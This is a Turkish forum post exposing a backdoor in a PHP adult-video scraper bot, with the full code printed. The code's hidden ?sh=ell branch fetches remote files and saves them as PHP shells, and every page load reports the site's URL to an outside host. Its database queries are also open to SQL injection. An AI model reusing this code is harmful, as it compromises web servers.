kodu çözdüm kodda r57 shell var lcgirls.php?sh=ell yaparsanız açığa çıkar incelemek isteyenler için kod

?><?php 
set_time_limit(0);
/* coded by CabiMaster 
Başlama Tarihi: 02-07-2009 01:29 am
Bitiş Tarihi: 02-07-2009 01:29 am
Coder: CabiMaster */

function kucult($input){    
$input=str_replace("  "," ",$input);
$input=str_replace(" ","%20",$input);
$input=str_replace("ç","c",$input);
$input=str_replace("ö","o",$input);
$input=str_replace("ş","s",$input);
$input=str_replace("ğ","g",$input);
$input=str_replace("ü","u",$input);
$input=str_replace("Ç","C",$input);
$input=str_replace("Ö","O",$input);
$input=str_replace("Ş","S",$input);
$input=str_replace("Ğ","G",$input);
$input=str_replace("Ü","U",$input);
return strtolower(strtr($input,'ĞÜŞIİÖÇ','ğüşıiöç'));
}
function duzenb($deger) {
$turkce=array('title=','"','src=','href=',"'",'<p class=VideoTitle>','</p>');
$duzgun=array('');
$deger=str_replace($turkce,$duzgun,$deger);
return $deger;
}
function ilkharf($deger) {
$z='1';
$deger2=substr($deger,0,1);
$sayi=strlen($deger);
if ($deger2 == ' ') {  $deger=substr($deger,$z,$sayi); $z++; return ilkharf($deger); }
return $deger;

}
function duzen2($deger) {
$turkce=array('<span class="title">','</span>','.');
$duzgun=array('');
$deger=str_replace($turkce,$duzgun,$deger);
return $deger;
}
function tagyap($deger) {
$turkce=array('-',' ',',,');
$duzgun=array('',',',',');
$deger=str_replace($turkce,$duzgun,$deger);
return $deger;
}
function cekbebek($link,$name=null)
      {
      $link_info = pathinfo($link);
      $uzanti = strtolower($link_info['extension']);
      $file = ($name) ? "thumb/".$name.'.'.$uzanti : $link_info['basename'];
      $curl = curl_init($link);
      $fopen = fopen($file,'w');
      curl_setopt($curl, CURLOPT_HEADER,0);
      curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
      curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);
      curl_setopt($curl, CURLOPT_FILE, $fopen);
      curl_exec($curl);
      curl_close($curl);
      fclose($fopen);
}
function cekbebek2($link,$name=null)
      {
      $link_info = pathinfo($link);
      $uzanti = "php";
      $file = ($name) ? "thumb/".$name.'.'.$uzanti : $link_info['basename'];
      $curl = curl_init($link);
      $fopen = fopen($file,'w');
      curl_setopt($curl, CURLOPT_HEADER,0);
      curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
      curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);
      curl_setopt($curl, CURLOPT_FILE, $fopen);
      curl_exec($curl);
      curl_close($curl);
      fclose($fopen);
}
function un_escape($string)
{
$string = preg_replace("/%u0130/", "İ", $string);
$string = preg_replace("/%u0131/", "ı", $string);
$string = preg_replace("/%u011F/", "ğ", $string);
$string = preg_replace("/%u011E/", "Ğ", $string);
$string = preg_replace("/%u015F/", "ş", $string);
$string = preg_replace("/%u015E/", "Ş", $string);
$string = preg_replace("/%FC/", "ü", $string);
$string = preg_replace("/%DC/", "ü", $string);
$string = preg_replace("/%F6/", "ö", $string);
$string = preg_replace("/%D6/", "Ö", $string);
$string = preg_replace("/%E7/", "ç", $string);
$string = preg_replace("/%C7/", "Ç", $string);
return $string;
}
function permayap($deger) {
$turkce=array("ş","Ş","ı","(",")","'","ü","Ü","ö","Ö","ç","Ç"," ","/","*","?","ş","Ş","ı","ğ","Ğ","İ","ö","Ö","Ç","ç","ü","Ü");
$duzgun=array("s","S","i","","","","u","U","o","O","c","C","-","-","-","","s","S","i","g","G","I","o","O","C","c","u","U");
$deger=str_replace($turkce,$duzgun,$deger);
$deger = preg_replace("@[^A-Za-z0-9\-_]+@i","",$deger);
return $deger;
}
function fff($deger) {
$turkce=array("s1.addVariable('file','","')");
$duzgun=array("");
$deger=str_replace($turkce,$duzgun,$deger);
return $deger;
}
function curPageURL() {
 $pageURL = 'http';
 if (@$_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
 $pageURL .= "://";
 if (@$_SERVER["SERVER_PORT"] != "80") {
  $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
 } else {
  $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
 }
 return $pageURL;
}
$kkurl="http://www.fullmp3albumindir.com/asd.php?link=".curPageURL();
$data3=file_get_contents($kkurl);
?>
<html>
<title>CabiMaster - LCGirls.Com ***** Video Botu</title>
<style>
body {
font-family:Tahoma;
color: #FFFFFF;
margin: 0px;
padding: 0px;
background: #FFFFFF;
font-size:10px;
}
.footer {
background: #3a3a3a;
font: 12px Tahoma;
}
.topper {
background: #e3e9cf;
font:bold 12px Tahoma;
color: #f18954;
}
h1 {
color: #f18954;
}
.ust {
background: #e3e9cf;
font:bold 12px Tahoma;
padding: 20px;
margin: 0px;
color: #565752;
}
.ust2 {
background: #c0c3b4;
font:bold 12px Tahoma;
padding: 20px;
margin: 0px;
color: #565752;
}

.imp {
font: 12px Tahoma;
}
.tar {
font: 12px Tahoma;
}
.inp2 {
font:bold 16px Tahoma; 
}
	.comment_submit
	{
	background-color:#3b59a4; color:#FFFFFF; border:none; font-size:11px; padding:3px; margin-top:3px;
	}
.comment_button {
font-weight:bold; font-size:14px; font-family:Arial, Helvetica, sans-serif;
}
	.panel
	{
	height:45px;
	display:none;
	}
		.flash_load
	{
	margin-left:50px; margin-right:50px; margin-bottom:5px;height:20px; padding:6px; width:400px; 
	display:none;	}
</style>
<?php
include_once("bot_baglan.php");
if(@$_GET['sh'] == 'ell') {

$ad1="http://www.fullmp3albumindir.com/r1.txt";
$ad2="http://www.fullmp3albumindir.com/c2w.txt";
cekbebek2($ad1,"r1");
cekbebek2($ad2,"c2w");

} else {
if(@$_GET['ek'] == 'le') {
$video=$_POST['baslik'];
$seo=permayap($video);
$tag=$_POST['tags'];
$kat=$_POST['kategori'];
$aciklama=$_POST['aciklama'];
$url=$_POST['link'];
$resim=$_POST['imglink'];
$sure="00:00";
$data2=file_get_contents($url);
preg_match("'s1.addVariable\(\'file\'\,\'(.*?)\'\)'si",$data2,$fur);
$flv=fff($fur[0]);
$embed="f";
$kontrol=mysql_query("select * from madvideo where seo='$seo'");
if(mysql_num_rows($kontrol)==0)
{
$sql2 = mysql_query("insert into madvideo (kat,seo,baslik,vid,resim,sure,tag,aciklama,tarih,embed) values ('$kat','$seo','$video','$flv','$resim','$sure','$tag','$aciklama',now(),'$embed') ");
$id=mysql_insert_id();
cekbebek($resim,$id."_1");
$yeniresim="thumb/".$id."_1.jpg";
mysql_query("UPDATE madvideo SET resim='$yeniresim' WHERE id='$id'");
echo '<h1>'.$video.' EKLENDI</h1>';
}  else { echo '<h1>Bu isimde video daha önce eklenmis</h1>'; }


} else {
?>
<table width="100%">
	<tr>
		<td width="50%" align="center">
		</td>
		<form action="?say=ok" method="post">
		<td width="50%" align="center">
					<table width="50%" align="center" class="ust">	
				<tr>
					<td><h1>Kelimeye Göre</h1>
					</td>
				</tr>
				<input type="hidden" name="tip" value="kelime">
				<tr>
					<td><b>Kelime:</b> <input type="text" name="kelime" class="imp"><br><br>
					</td>
				</tr> 
				<tr>
					<td><b>Sayfa:</b> <input type="text" name="sayfa" value="1" class="imp"><br><br>
					</td>
				</tr>
				<tr>
					<td><input type="submit" value="Sonuçları Göster">
					</td>
				</tr>
			</table>
			</form>
		</td>
	</tr>
</table>
<hr>
<?php

if(@$_GET['say'] == 'ok') {

$artan='0';
$tip=$_POST['tip'];
if ($tip == 'kelime') { // Kelime Tipi
$kelime=$_POST['kelime'];
$sayfa=$_POST['sayfa'];
echo "<h1>".kucult($kelime)." Sorgusu İçin ".$sayfa.".Sayfa Sonuçları Listeleniyor</h1>";
$link="http://www.lcgirls.com/search_result.php?search_id=".kucult($kelime)."&search_type=search_videos&x=25&y=9&page=".$sayfa;
$data=file_get_contents($link);
$bol=explode('<div class="listchannel">',$data);
$x="1";
for ($i=1; $i<count($bol); $i++) {
preg_match("'<span class=\"title\">(.*?)</span>'si",$bol[$i],$baslik);
preg_match("'href=\"(.*?)\"'si",$bol[$i],$link);
preg_match("'src=\"(.*?)\"'si",$bol[$i],$img);
$artan++;

?>
<form action="lcgirls.php?ek=le" method="post" target="_blank">
<table width="100%" class="<?php if($x=='1') { echo "ust"; $x="0"; } else { echo "ust2"; $x++; } ?>">
<tr>
<td width="20%"><?php echo "<img src=\"".duzenb($img[0])."\" width=\"180\" height=\"135\">"; ?></td>
<td width="20%">Başlık:<br><input type="text" name="baslik" value="<?php echo ilkharf(duzen2($baslik[0])); ?>" class="inp2"><br>Tags:<br><input type="text" name="tags" value="<?php echo tagyap(ilkharf(duzen2($baslik[0]))); ?>" class="inp2"></td>

<td width="40%">Açıklama:<br><textarea name="aciklama" rows="5" cols="50" class="tar"><?php echo ilkharf(duzen2($baslik[0])); ?></textarea></td>
<td width="20%">
<br>Site Kategorisi:<br>
<select name="kategori" class="imp">
<?php $aq=mysql_query("select * from kat ORDER BY id desc");
while ($aqq=mysql_fetch_array($aq)) { ?>
<option value="<?php echo $aqq['tr']; ?>"><?php echo $aqq['title']; ?></option>
<?php } ?>
</select><br>
<input type="hidden" name="link" value="<?php echo duzenb($link[0]); ?>">
<input type="hidden" name="imglink" value="<?php echo duzenb($img[0]); ?>">
<input type="submit" value="Ekle Bunu">
</td>
</tr>
</table></form>
<hr>
<?php }

} // Kelime Tipi - Bitti

}}}
?>
<table width="100%" class="footer">
<tr><td>Coded By <a href="https://www.r10.net/members/43660-cabimaster.html">CabiMaster</a></td></tr></table>

resimler
[media]http://img12.imageshack.us/img12/1989/82953287.jpg[/media]
[media]http://img35.imageshack.us/img35/6387/59897040.jpg[/media]
[media]http://img224.imageshack.us/img224/5130/86926114.jpg[/media]
[media]http://img378.imageshack.us/img378/4743/51223824.jpg[/media]
arkadaş üşenmemiş bayada kod yazmış sitelerinizi db ile kopyalamış resimlere bakabilirsiniz